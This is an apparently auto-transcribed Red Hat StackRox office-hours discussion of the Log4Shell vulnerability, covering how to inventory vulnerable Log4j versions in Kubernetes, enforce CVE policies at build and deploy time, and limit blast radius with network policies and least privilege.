 and welcome back. It's a new year, new Stack Rocks office hours. We had a little bit of a firework towards the end of the year with a log for Shell, so we figured we'd kick it off with a bang, bring some Stack Rocks experts on and talk about log for J, log for Shell exploit, Kubernetes, what was different, a little bit of Stack Rocks and Stack Rocks news. And to join me I have, to my left, I got Neil Carpenter, senior principal specialist solutions architect, below me I have Eric Bannon, senior specialist solutions architect, and at the angle there I have Chris Porter, who's the director of solutions architecture, all at Red Hat and all came over with myself as part of the Stack Rocks acquisition last year. So fellas, thanks for joining me. I guess we're going to kick it off with just the hot topic of breaking down log for Shell, what happened, a little bit of a timeline as well for some people who might not have been following it. So I'll punt it to whoever wants to pick it up. I can start off, this is Chris. I think everybody's probably heard of this thing already, right? It's the problem that keeps on happening. The initial disclosure I think was done rather rapidly and a lot of people were taken unaware. But this is kind of the worst fear of most security teams. There is this vulnerability in a very, very commonly used Java library. So almost every enterprise Java application out there depends on the log for J library. It allows an unauthenticated remote attacker to essentially cause a remote execution in your environment. Now there's a couple of requirements for that. The applications that are exposed have to be writing that data to the log and not parsing it or sanitizing it. So it's a problem of unsanitized input. So the carefully crafted message that can be submitted to an application if that particular bad string gets logged through the log for J library, you can cause an arbitrary code execution on an LDAP or an NDI server. So it's really widespread. It's really easy for an attacker to exploit. And the result gives most the attacker a substantial amount of application freedom. So this gets that 10.0 on that scale of 1 to 10. It's kind of the worst nightmare. I've seen it labeled as the worst security vulnerability ever. We've seen a lot of organizations scrambling to find out where they're impacted by this. The other challenge with it has been that over the course of a couple of weeks, the mitigation for this has been a little bit muddled. And so the initial exploit came out. There was an immediate fix. There were some recommendations around changing the configuration using environment variables that you could use to mitigate this that turned out to be incomplete or ineffective at mitigating the problem. I think that what happened is that security researchers turned their eye to this library after the initial discovery. And so there were a couple of other additional discoveries. So the authority on all of this, of course, is the Apache page for log for J to look at the various vulnerabilities. But we're not talking about a single vulnerability here, but a series of them that ended up either being arbitrary code execution or denial of service or it's a bunch of problems. Who knows if we're done yet? But the fact that it keeps on popping up here is today's topic. So I thought we would talk a little bit about OpenShift and Kubernetes today and how organizations can discover this vulnerability or vulnerable versions of this and tackle it using something like StackRocs. We want to talk a little bit about how the process should work because organizations that found themselves with a blind blindside here by this really should use the opportunity, in my opinion, to establish a more of a permanent process because this isn't going to be the last one, right? There's no way that the world is done with vulnerabilities and commonly used libraries. And so setting up a process, the crisis here drives an opportunity for us to help customers and users improve the situation going forward. And, you know, Chris, one of the things I really love about this vulnerability, to the extent you can love something about a vulnerability, is how it was applied. The first compromise I'm aware of that used this was somebody who was attacking Minecraft users, the game, which is all Java based. And what was happening was this vulnerability is so flexible that by sending a single message in chat, apparently, they were able to compromise both Minecraft server and everybody connected to that server, right? An incredibly powerful vulnerability that since then has been used in a lot of different places for a lot of different things. But it really drives home how foundational this particular issue is and why everybody's been so concerned about it. You touched on a little bit of the challenges with the update, right? Because there was an initial patch and there was a belief that that was the fix. And it also had a slight misconfiguration, let's say. And one of the reasons why I want to talk about open shift in Kubernetes specifically is you do need some sort of process where, okay, yeah, we had a misstep or something's gone wrong. What's the quickest way we can get updated? And then can we verify that we've done all those upgrades, that the right versions in there? And that we've made the configuration changes. So I was hoping you could talk a little bit about how we can set something like we can use Kubernetes to, let's say, make that fixing process a little bit easier and identify those vulnerabilities a little bit quicker. Yeah, maybe instead of just talking about it, I could show you some of this. And I will practice this by saying the lab environment I have up, none of what's running is available from the internet. Because I'm going to show you I have some vulnerable things running here, but you can't get to any of that. So I've got OpenShift up and running in this environment. As a matter of fact, I've got both OpenShift and Azure, AKS, in this particular environment. But we're going to focus on the OpenShift side of it for today. And I've also got Advanced Cluster Security, the Red Hat version of Stack Rocks up and running. And this is really, I think, a great starting point to give us visibility into what's deployed, what's running, what the state of it is, what components are in there and what's vulnerable, which is all the stuff that we want to have to get to where Mr. Foster was pointing us. And so let's dive in here. And I think, you know, we have a very specific example with Log for Shell, with CVE 2021-44228 and the following, the vulnerabilities that followed it. But this is also a really common scenario in going back 15 years or more in my career of, you know, hey, I just saw this vulnerability in the news. I just saw reports about this. You know, the FBI just called us and warned us about something. How do we go look and see if this is a problem for us? And so sometimes you're starting even without a CVE, you're starting with a report that says a particular component of a particular version may have a problem. And so it's important not only to be able, not only to be able to go look at your vulnerabilities, but if we take a step back from that, we may have started early in this and said, hey, I'm reading something about this Log for J component. How are we, how are we using that? Where are we using that? And so in ACS, I can go dive through all the components that are currently in use in the images that are backing my deployments. And so I can see here a list of all of the components across everything, and I can pretty easily filter this down to let's look for Log for J. There we have it. And I can see I have a number of different versions of Log for J currently, currently running in my environment. And so like in the initial, in the initial vulnerability in 2021, 4, 4, 2, 2, 8, everything 2.14 and below, if I remember, 8 was vulnerable, don't, don't quote me on that, but 1.x was not. So I could, I could easily come in here and go, well, I've got a 2.6.2 and 2.11 and 2.11 and 2.14 and 2.14. All of those appear to be vulnerable. So this is, this is a starting point for me before we even get to the vulnerability. It's about being able to look at that makeup, that inventory of what we're running and understand what's going on and where things are going on. So I can see, for example, here, I've got a bunch of images that are not actually in use in my environment today. But I do have this 2.11.1 is in use in two deployments. And I can go look at what those deployments are. And there are some outdated versions of SonarCube, I'm still running in this, in this lab just to have something to show off. But I can go dig into and find those things and dig and get to them. Now, from there, once I have a CVE to look at, once again, that inventory based on vulnerability. So I can say, let's go, I type it in right. Let's go see what we have that's actually failing that vulnerability. And I can see I've got two deployments, seven images, five components. I can dig into it. And once again, see this, I already saw some of the stuff, but I can see the specific versions that are vulnerable to that. I can see the deployments they're running in. So now this is starting to get me to a place where, I don't know, late December, when everybody was trying to figure out what was going on, what the extent of their exposure was. This is starting to give me that information. So I can take this inventory, dive into what's deployed, what's running in my environment, and say, all right, here's where I actually have a problem with this. And this is something I think Chris, Eric, and I all talked to a number of customers about in late December and into January, was how do we go start with this inventory? How do we figure out what's already deployed? One of the issues with Log4J is it's such a ubiquitous component. It's so common in Java applications that nobody really knew everywhere it was being used. Upstream vendors had used it to log data and to manage that. Off-the-shelf software had used it. Lots of people had used it. So nobody really had a good understanding sort of the third week in December of where they were impacted and what was impacted. So this gets us there, right? We can go look at what's currently deployed. Sierra, we've got a problem. Now, from here, there's a couple of things that we can do that I think are of interest. The next thing is, so if we know what's, if we've got our arms around where we are today, we want to start creating policy to catch this particular problem. ACS, we have some generic policies that are going to catch all of our vulnerabilities, but that's a fair amount of data going on and a fair amount of work that customers typically do with that. We may want to create, if we have a particular emerging set of circumstances like Log4Shell, we may want to create a targeted policy that looks for that. And in this case, we actually, on the engineering side, created one and that is here. So we created a default policy to look for this, but in other cases, I could create a policy that says, you know, CVE 20221234 is particularly interesting for some reason. I can create a policy that says, let's go look for this vulnerability, start generating alerts, potentially turn on enforcement, say, you know what, this is critical enough that we're not going to allow you to deploy something that has this vulnerability in it. And so in this particular case, this policy is really simple. We're looking for CVE 202144228. We have some information here about it. And so we can find it. And we can go look in our violations and say, show me any violations of that policy. And I can see where my deployments have cut across that. I could turn on notification and start sending these out. So if somebody tries to deploy something, we get an email or we get a Slack message or whatever, however we want to be notified. And like I said earlier, I could turn on enforcement and take that a step further and start blocking anything with this vulnerability in it from getting deployed. And that's starting to get my arms around this issue. But ultimately, what I'd like to do is shift left. We've all talked about that for years now. But I'd really like to start catching this before somebody ever tries to deploy it. And so not only can I enforce this at deploy time, but I can move it back and it build time, start looking at what I'm building, start scanning and start returning results and start applying these policies at build time. Same policy, same criteria. I don't have to go create different policies to do this. And so I've got OpenShift Pipelines up and running. I've got an image that I borrowed just to show you this. And so I can see as part of my scan there, we caught not just our general vulnerability policy. This has got a number of vulnerabilities in it, but specifically this log for shell policy that we created. And so I can see that that's being caught there. And so now I've taken that security concern. I've taken it all the way left to where I'm building or ingesting images. And I'm able to catch that and start, I actually wasn't enforcing this, but I'm able to start breaking builds so that you have to fix this vulnerability. You have to fix this problem before you can ship it and before it can ever be deployed in your environment. And having that flexibility, I think, is where I'd say the money's made because you don't really want to be just forcing decisions on developers, maybe give them, you know, if something's not getting pushed to production right away, you're giving them a little bit of time saying, hey, if you don't fix this within two more builds, you know, we're going to basically flip the policy or something like that. It's the awareness side. And then using basically going into the tools that the developer is going to be using and looking at, I think, is where the value is, right? Yeah. And for me, I think there's some big things there, right? First of all, the flexibility of a policy-based approach lets you start defining, what am I interested in? What do I want to see? And then further on, what do I actually want to enforce? Where do I want gates that I'm not going to allow things to get passed? And defining those things and applying them flexibly across that whole pipeline from build time to deploy time and then into runtime. And realistically, you're probably going to have, you know, five, six, seven teams all with different types of gates and different applications set up too, right? So you're going to need maybe some flexibility because some teams use different CI and build tools. So that all needs to be adjusted too, right? And like some teams will have front-end and others are data science. Maybe it's less impact, right? Absolutely. Yeah. I mean, I think I'd like to think the best of my development teams, right? If I'm a security director, you know, I got to assume that they want to fix these things. Don't want to be on the big board for being a huge risk here, right? What I like about this policy-based approach is, hey, it's present in your build. You do what you need to do to fix it. It could be update the version of it. Maybe this is something that's not easy to do with log for J, but with a lot of other components, you find a vulnerability in something that you're really not even using, right? If it's not a critical part of your application, just take it out, right? It came with your Docker base image. It came with, you know, some other install that you did. Maybe you weren't aware, you know, there's a lot of reasons why the policy here is left in the hands of the developer, because instead of, you know, fixing a vulnerability by updating to a, you know, a properly fixed version of that library, another option is, you know, remove that dependency. If you don't have it there, you don't have to maintain it. I don't care. As a security director, I don't care one way or the other. I just don't want the vulnerable version present in your application. And so you got whatever way you want to resolve that is fine with me, as long as that condition gets met. And that's really what the policy is saying here. Yeah. And I think like, you know, just from a couple of customer examples, right? I think like the first, the first thing everybody wanted to do, which Neil was showing in the beginning of the demos, everybody wanted to just know, okay, am I exposed to this vulnerability? Do I have it running in a deployment? And I had a couple, you know, customers come to me and go, okay, I've done that a couple of times. I was able to use the information in ACS to hand, you know, hand something to a developer and say, yeah, fix this. And they were able to move the needle on that. The next question logically becomes, okay, how do I remove myself from that feedback loop so that I have an automated control in place to tell developers about those things? And I think it gets really interesting there. You know, now you have kind of this automated notify and inform stage where, you know, you're not just kind of exporting data and handing them a list, but you're really getting it in that place where they're building the application. And I also think like, there's an opportunity there to, you know, for security teams to put their own spin on the policies, right? As it relates to this vulnerability, like they might have certain mitigations in place that they've put in and they want to, you know, they want to add an extension to that policy that captures, okay, this is something that's vulnerable, but we also want to capture, you know, X, Y, and Z, or we want to put a preference on these namespaces. And so I think there's a lot of automated control. You know, we give the security team, right? Like to be able to put that in a policy and, you know, remove themselves from just having inventory things constantly and, you know, manually doing a lot of that stuff. Yes, that's a great mitigation for one of the worst problems in security, which is, I fixed it all today, we fixed all of the applications. And then tomorrow, somebody changes a dependency, brings in a vendor supplied image, and boom, the thing is back, right? And so once the attention drops from that manual review process, then they will find that old vulnerabilities resurface, right? And so, you know, we love giving developers the flexibility to do what they want, to experiment with different packages to go out and, you know, try that new software component. But then we find out that it's still got these dependencies on these old versions, but a policy is not going to forget, right? That's not going to forget that you brought in this library and it found that it still has that vulnerable version on it. So that, I think, I think that, you know, we're talking about here is not just Log4j, it's honestly any vulnerability, having a process in place. And we have customers who had such a process in place, and they had a lot less to worry about when this thing was released. They knew that no further development, you know, nobody could push a build, nobody could promote anything to a running environment if this thing was present, just because the policy was already in place and the dev teams were used to reacting to that. So the policy, the process is really where the security is here. And I think that also, you know, it moves the needle on the enforcement conversation in these organizations, right? Where, you know, these are kind of those blessings in disguise almost where, you know, security is able to take a little bit of a leap forward, I think, in that conversation around, you know, we can have something that we turn on. Because this is one of, I think one of those perfect examples where, you know, turning on like the deploy time policy that Neil showed is actually a pretty suitable option for production environments, right? And actually denying a deployment and, you know, obviously within a certain implementation, you want to be careful of how you do that. But I think that the fact, like you said, Chris, the fact that like we have that enforcement story is powerful, you know, because there's a lot of tools that can scan for this vulnerability. I think there's a lot of vulnerability assessment technology and scanning tools that can, you know, give an idea of where it's inventoried. But I think, you know, there's not a lot of ways of doing that native enforcement in a way that like moves the needle for security to say, okay, yeah, we can put a hard, we can draw a hard line here, we can turn this on and prevent this. And, you know, I'm more interested to see like, how is that going to help them with other things, you know, other things they're trying to do organizationally, right? If you have success with something this critical, you know, can you begin to turn on additional policies that have nothing to do with the log4j, but because you build that confidence, you know, in security, you're able to kind of move the needle or it. And Chris brought up one of my other, one of the things that I think is a really interesting move in Kubernetes and containerized applications. You know, a year ago, two years ago, we talked about CI and everything was built internally for the most part, especially when we talked to enterprises. Everything was focused on what my developers are doing, what my developers are delivering. And what's happened is we're starting to see vendors and external organizations deliver software as container images, as helm charts, as operators, whether it's the 5G providers in telecom, it's IBM cloud packs. You know, Chris and Eric, I think I told you guys, I installed TrueNAS scale the other day as a building a network attached storage device in my house. It has Kubernetes built into the platform to deliver applications. They've got a catalog of helm charts that deploy on top of that. This sort of consumerification of containers means that security teams have to think about that as well, right? Not just how are we scanning the things our developers are building, but how are we scanning the cloud packs we're getting from IBM, or the container images we're getting from Ericsson, or the things in external vendors delivering to us to run on top of OpenShift, on top of EKS or wherever we're running. Just because it's supplied by an external vendor doesn't mean your security policies don't apply. And I think this is a really great example of where, you know, because Log4J is so ubiquitous, it's been important to be able to go as early as possible to scan those externally supplied container images as well and understand what the inventory is there, what you're running that somebody else has handed to you. Neil, you've been doing threat hunting and incident response for a long time, right? The container format seems to me, right, with Kubernetes that it's a little bit more, you know, prescribed, right? We've got some limits around it. I've got a pipeline. I can establish a process. Is it easier then in this environment to track this sort of thing down if I've got, you know, limits on where I get my images from? I force them to go through a process. It seems like security teams should be advocating for the move to more containerized because they've got that control visibility and almost like a library of assets here. Yeah, I think once you figure it out from a security perspective, it's much easier to manage it and control it and to know what's deployed, know what it's doing and take appropriate action to contain it. Now, you know, I think all of us have been there, right? The knowing how to do it is the first big hurdle because it's a huge change for a lot of security professionals from traditional VMs and bare metal to containers and what that change means to them. But I think the organizations we work with who have gotten past the learning phase and really dug in and started doing it have are really automating security in interesting ways. I know you mentioned one of my favorite customers who is still in the middle of a move from monolithic on-prem data center applications to turning those into microservices, containerizing them and then deploying them on top of Kubernetes to run their business. It's a huge shift. It's a huge investment and they had some really smart security people early on who built out an idea of what this was going to look like and so we worked with them and they deployed day one with enforcement turned on at both build time and deploy time for their most important, their critical applications, their most serious security policies. Out of the gate, they had controls where they could say, you can't pass here if you don't pass these checks, you don't get these. That's really reducing the attack surface and starting to control what's there and have visibility into it. Half the battle is having the conversation between developers and security teams and when you have that sort of baseline of, hey, this is hardened, this is what we're willing to accept and we're willing to give leeway if you can make a specific case, well, that's then you can have people coming to the table and having that conversation. It makes security a little bit more fun, I'll say. It's a lot of doom and gloom when stuff like log4shell comes out. Another point I'd also put out there for Kubernetes is there is some security and speed, the speed at which that you can build a container and go and deploy it and use something like a Argo rollouts or Kubernetes native use cases to push something out. There is some, I don't want to say safety in it, but the speed at which you can go and patch something I think also brings, I hope security teams can see the advantage of that. I don't want to trivialize that. It's not easy for organizations to make a shift if they're used to build weekly, monthly, quarterly, and releases to go out in a big way rather than a continual process, but when they make that change and its developers get used to the idea that a new build every day, every hour, every pull request creates a build and then every one of those is an opportunity to pull in the latest to get those fixes down. That allows them to react to any of these. We'll keep saying this, but this is not the last of these. I'm not even sure that we're done with log4j yet. There's going to be more of these things that security researchers will find and being able to quickly go out and take advantage of those fixes as soon as you possibly can. Developers are better off when their dependencies are explicitly defined, it's something like a Docker file, and they can just rerun that build again and again. It is one of the better things about this format here. You're right too, we said earlier, Michael, about we call it the common language between security and developers. They haven't had a whole lot to talk about in common, but when we talk about using Kubernetes as a language of discussion here about deployments and images and defense in depth in those terminology, both sides can understand it. It is good. It starts the conversation and gets each team thinking about what the other team is concerned about, and if we break up the roles here of defining the security goals and then implementing them into the right authorities, you'll get less of the developer headaches who developers have a headache with security tools that just enforce. They don't provide information, they just break things, and that violates that principle that I want to specify everything and code. Of course, the security teams know that if you let developers do whatever they want, they don't prioritize security fixes. That's natural. You prioritize new features and fixing bugs and things like that. We're slowly grinding out the team collaboration here to get them to think about all these things together. One, they are actually heading towards the same goal, deliver applications better, faster, but more securely at the same time. We talked a little bit about policy, well, a lot about policy and about log for J. I'm curious, is there any sort of things that people could be doing beforehand that you could maybe show us? Obviously, there's a little bit of configuration in Kubernetes, just a little bit of configuration. I was wondering if, obviously, these things are going to happen. What are some practical ways, practical policies, best, just great habits that people can get into so that when this does happen, that they can, one, find those really quickly, and then two, make sure that the impact is very low, even if something was able to stay in the cluster for a couple of days. I think it was five days until NIST released it as an actual vulnerability, but from the Minecraft day until it was widely acknowledged. There's some lag there. I'll start in there. I often say that when you move to containers and Kubernetes and OpenShift, to some extent your security problems don't change. At the same time, everything changes. A lot of the approaches are the same that we've been talking about for years. If I can reduce the blast radius of a particular compromise, I sort of have to accept that at some point there are going to be zero-day vulnerabilities. There are going to be unpatched vulnerabilities. I couldn't patch for some reason. There are going to be some set of things that result in something in my environment getting compromised. We used to call, or we still, I guess, call it an assume breach mindset. If I start there, the next thing I can do is start making it so that if any particular piece of my application in my environment gets compromised, I can limit what an attacker does with that. One of the examples I think works really well in Kubernetes and OpenShift, once you start getting your mind around it and figure out the right approach, is network policies. Start applying essentially microservice firewalling down to the container level that says, the only thing this container can talk to is this other container that it always talks to. And it can't talk to anything outside of that pattern. And now you've locked an attacker into that. They can't compromise one container and then use it to jump other significant pieces in the environment. That sort of thing is an incredibly powerful tool and a great place to maybe not start, but once you start getting your arms around this to dig into and figure out, how do we do that? How do we reduce the blast radius, the impact of any particular container being compromised? And lock them down. Yeah. You mentioned those configurations, Michael, and they're complicated. And unfortunately, as you've seen from some of the StackRock stuff previously, there's quite a few of the configurations in Docker, images, and in Kubernetes where the default is wide open, right? And the network policies that Neil was talking about is one of those. There is no restriction on container networking within a cluster for Ingress and Egress unless you go and then change that. Things like being able to write to the file system, running as root user, like these are all defaults because they're really useful to get up and running and be productive with your application. But they're also super useful for an attacker. And so we see again and again, organizations running these big, fat Docker container images, the base images that were intended for a virtual machine at one point. They have loads of tools on them that are useful for maintaining and updating a virtual machine. They have all your standard Linux file system on there. They have cool utilities like Curl and open access to the Internet. And so now your attacker who's able to run arbitrary commands could go and pull down a crypto miner from GitHub and start running it. We see that it isn't even just an attempt to steal data or establish backdoors in the environment, but this free resources. If I can run my workload on your infrastructure, I'm making money off of your back. And if you haven't detected that activity, then you're going to be faced with a big cloud bill potentially, but you're going to have this problem in your midst that you weren't even aware of. Some of these are pretty easy, frankly, to defeat. They're pretty naive attacks. Just throw enough of this arbitrary commands out there to see what sticks. And enough of it sticks to make it useful to do that. So there's a ton of those things. I'd just like to think about this as a containerized applications are not VMs. They're not general purpose. And they represent a kind of constrained runtime. You get similar benefits to things like serverless, which is another topic. But when you can't run a general purpose workload, if it's built around a particular microservice, a particular batch job, or whatever, you should use that to your advantage to constrain what an attacker can do. They might compromise that. Like Neil said, you have to expect that there's other zero days that are present in your application right now. And you should plan on that being a reality. So let's not give them any surface area. Of course, too, developers need to be careful about the kind of input they accept and sanitizing it. But that's a different topic. That's a source code practice and secure coding topic. But all these things contribute. The more painful we can make it for an attacker to do anything useful, I think you're going to be in better shape. I think it's the things you mentioned, Chris and Neil, I think those are good starting points too. When people ask, okay, what can I focus on when it comes to risk or when it comes to things I might be able to enforce a little bit sooner than later. There's a handful of those high-end of the right types of configurations and risks that any customer should care about. There's obviously the unique stuff that might be depending on how a customer is running their specific environment. But in general, you don't want to be running as privileged. In general, you don't want to be running as root. You don't want to be running in these over-excessive configurations. I think a lot of that's just customers getting educated on what is the right way to do security on Kubernetes right now, to your point, transitioning from VMs to containers. But I think what we've always seen is when we give customers those handful of policies or those handful of things that they can do, it's pretty great. Then you look at the customer that Neil mentioned, where they get down the path of adopting some of those things between developers and some of those processes are in place, they're able to actually take advantage of enforcement eventually and do some of those things. But yeah, I think it's a really good opportunity to just not focus on everything that you could possibly prevent. But there's a handful of really just low-hanging fruit, like start here, get these things, get adoption of this mindset that this is the way we want to run containers as best practice. And also, who is in charge of what? Because I think one of the largest issues with Kubernetes is you have a developer who might just do the build for the container and they don't set up the configuration and then it's okay. Well, does the operations team know exactly what's going on in the container? And now, okay, well, if you give them a UI that shows them the normal traffic in the test environment, for example, well, then we can mold a network policy and test it. But that communication, it can be really annoying, especially as you try to grow Kubernetes and grow your team and expand and maybe you lose a developer. So just having that wealth of information, I think, is well, I think was one of the largest hurdles early in the Kubernetes. I think it's been somewhat solved, although developers might say different. But yeah, I was kind of curious, you know, how do you bridge that gap and like what specific actions and the tools do you look for to kind of help with that communication, especially from a network policy? I think that is one of the let's say once you get to scale and you start looking at you're looking at hundreds of network policies, thousands of network policies, right? How do you visualize that? How do you keep that all organized? Toss up? Well, it's a tough, it's a tough challenge when when organizations are coming out of the way the way most of these platforms get rolled out. So Kubernetes is in use and you're trying to get security coming in after the fact, right? Developers are racing in a million miles an hour to go to these platforms. It's super easy to provision these clusters and you know, to repurpose bare metal or VMs for Kubernetes now and security team is forced to come in. I mean, you know, it's like tackling anything, right? With with cloud 10 years ago, you got to carve off little manageable bits. You got to be willing to make exceptions and understand where you know, there's business priorities, right? We talk about risk a lot at Stack Rocks and you know, security organizations want to reduce that risk, but sometimes there's, you know, a need, right? Certain things need to be exposed in a way to make them useful and application teams need to understand what some of that risk is and be be willing to to accept it. So I actually have a tough time answering this question about where to get started except when the customer has some goal like, hey, we have to be PCI compliant or we you know, we want to follow this, like it's great to have a set of marching orders because then I can go and point out, hey, PCI, hey, that talks specifically about some of the networking stuff that Neil was addressing, right? And minimization of privileges is frankly, you know, a bog standard part of every compliance benchmark out there. So when the customer has a goal like that, generally, you know, prioritization, right, is the way to go. So some applications are the crown jewels. Some applications are frankly, you know, you know, that we need to run them, but they're not they're not super critical, right? So if organizations have a means of identifying that and specifying how that works here, Kubernetes gives us a little bit of help with being able to use metadata, like a namespace, like labels and annotations, like make use of those standards to express something about the priority of it, it'll help everybody and operations and developments and others. It'll help security teams make a decision about, you know, about exceptions to those policies. So in general, the way to approach this, I think, is lots of tools, lots of visibility, there's tons of stuff I would start with the crown jewels, right? I want to identify a particular namespace that has this super important client data in it, or, you know, it's sensitive regulatory data or whatever it might be. And that's where we start to apply the scrutiny and start to enforce things and, you know, notifications and warnings and then followed by enforcement. One of the things that we've seen is a tendency for organizations to treat, you know, production really differently security wise from development and UAT, right? Development environments are usually these sandboxes that are kind of like throw away, they're a mess. But we know that attackers find them just as valuable as your production applications, right? Maybe even more so. So I'm starting to get away from saying that, you know, hey, you could warn somebody about this in development, but let them run whatever they want. Because, you know, if I want to run a crypto miner on your infrastructure, that huge development cluster that you have is really appealing to me, right? Maybe there are fewer limits in that Amazon account or that Azure account. And I can scale up my workload to, you know, to mine whatever the trendy, you know, coin of the week is. So I think having that kind of scrutiny, like you quickly need to move from thinking about one production application to getting to basically an organization-wide policy. There's a couple of steps you can take in there, but you need to get to that organization-wide strategy. So, you know, Michael, there's two other things that occurred to me. You're both, both of your last two questions. Wargame, this stuff, right? Don't wait until log for shell 2.0 comes out to figure out where all of this information is, who owns which pieces of it, who needs to do what, how you quickly resolve a vulnerability and ship a new image. Go do that stuff today. You know, it's January, everybody's probably a little slow, but periodically work through these sorts of situations. And I think the other thing that goes along with that is know your outside resources, your vendors and other people who can help, right? So if you're running OpenShift and ACS, StackRocks, and you're using Red Hat UBI images, know how to get in touch with us or whoever your vendors in those spaces are. So if you're trying to figure out how you go find these things or where you find a fix for this or whatever else, you know how to do that and you know where the right pieces are. Get ahead of it. Yeah, and you can always come and spam us in the chat if you want to get in touch. It's an easy one. But yeah, I know you're 100% right. And the Wargame thing is interesting because I always find securities as huge fear. It's like a flutter of fire, right? We're just putting it out after. But I think it could be fun if you set something up like that. And it's like, okay, let's see how much we can automate. And then go take a break for a second so that when the fire does come, it's just like a little kitchen fire or whatever. We'll make a little change and we can move on. That's the way I picture security, whether or not that actually happens in real life. But I'm hoping that when the tools get implemented and you know, you go through the growing pains that that's where you should ideally get to, right? That's sort of the idealistic version. Yeah, Neil, I like how you kind of brought it back to something simple, which is just like, get everybody in a room and play these things out and talk about it, right? Like, you don't need to like, you don't need to be advanced. You don't need, you know, by getting all the relevant parties in the room. I was meeting with a university the other day, a large university in California. And they, you know, they didn't have all the processes in place and have all the technologies and have all the advancements. But what they had was a desire across all the teams to work towards the mark. You know, and I thought that was really, really cool to see that when one of the developers, you know, we go, Hey, what do you think about security? And he goes, I just want to build things in a safe way and not do something that's going to go against what the organization is trying to do. And it was just, it was such a simple like quote, but it reflected like the appropriate mindset, right? Like if nothing else, if everybody gets in a room across platform security operations development and starts talking about, Hey, this is a real problem. You know, let's, let's have like regular occurring meetings about the, the the realities of cyber security risk. I think that's like that, like, that's like huge, right? You know, like, so I don't, I want to, I want to underscore that, you know, like what you were talking about, right? It was like, where you have these war rooms or you have these conversations just that just to have that dialogue begin, I think is this critical, you know, like to have a desire there, you know, something else. Okay, so silver lining if long for Jay is the catalyst for, you know, for having these discussions to say, you know, hey, we've got this problem, it's widespread, we're gonna have another the next one, you know, the dark corners get illuminated a little bit and teams start to think about how to make this better. I mean, it's speaking to all the, you know, all the current, the current trends and security and the news you see around supply chain and vulnerabilities and compromised vendors and, you know, being able to sort this stuff out. It's not just technology either, right? It's people and processes that are super important for this stuff. So it's a good opportunity to, you know, to put some diligence into making sure that you fix it this time, but then, you know, the next one that you're just as prepared. Yeah, I have a little bit of a hot potato for the end topic, because we're coming up on time. So because it's an open source vulnerability, there has been conversation about, you know, is it is open source secure? And like, what is secure open source? You know, how do we make sure all these packages are maintained? Just kind of want to throw it out there. You know, what's your opinion? Do you think it's overblown? Do you think there's, you know, crappy software everywhere and you just need to take reasonable mitigations? Like, what's what's your opinion on that whole, you know, open source can't be secure and you're going to continue having these these issues crop up? Well, I mean, if this was a commercial product, the same vulnerability would be present. We just know a lot less about it, right? I mean, there's never a point where hiding any of this stuff really makes makes any sense in terms of security. So I think that open source here really is, you know, this is one of the shining moments, right? That, you know, vendors that are dependent on this, we're able to easily determine that the open source components in their environment were impacted by this, the suppliers like Red Hat were able to quickly alert customers to it and, you know, supply fixes as soon as those became available, because it was very obvious to everyone. There's pressure on anyone who's got this known supply vulnerable version. And I think that the process makes sure that it's there. It's easier to do diligence when, you know, when everything is open in this way. It was also easier to share the pain online when I was watching everybody go, what, there's a, you just see everybody kind of all come together to discuss what's going on and how to fix it. It's enlightening. I don't know, it's like a therapy session. Yes, right. You can't get that kind of collaboration with a closed source environment, right? And, you know, you have to depend on the, you know, the responsibility of the vendor to disclose those things when they come up in a closed source, you know, especially when something's being shipped to you as a binary, you know, an operating system image, a router or switch image, you know, those things aren't very transparent. And so you're relying on the goodwill of the vendor that supplied it and their expertise. Now, most vendors are responsible in that way. But, you know, with this one, it's pretty clear. It's pretty easy to tell who's got the vulnerability present and put pressure on them to release fixes. So, mm-hmm. Any other, uh, Eric Neal, you're gonna let that one just simmer. You're good with that answer? You know, I, I think it's a software problem. It's not an open source or a closed source problem, right? So it's, it's really about having good process, being able to find these things, having vendors you're trusting can work with. And then, you know, the assume breach stuff, limiting the blast radius, being able to find anomalies, all of the stuff. Because no matter how good your vendors are, no matter how good you are at this stuff, at some point, somebody's going to be faster, smarter, luckier than you are going to compromise an asset. So at the end of the day, I don't, I don't think it, it, I don't think it's going to make a strong difference whether it's closed source or open source. It matters that it's software. Do drop the mic on that one. Is that, uh, any, uh, any news, anything, uh, you guys want to share before we take off and, uh, maybe, well, head to dinner for me. I know you guys are on the West Coast. Well, Eric is, but, any last words, anything you want to cover before we take off? Stay tuned for the next exciting vulnerability. I was going to say, yeah, next, next month, next week's episode. Yeah, next month, uh, third Tuesday. Hopefully we'll be talking about some lighter subjects, I hope. Uh, and some more news about stock rocks open source in coming up in the coming months. So stay tuned and, uh, stay safe and stay secure out there.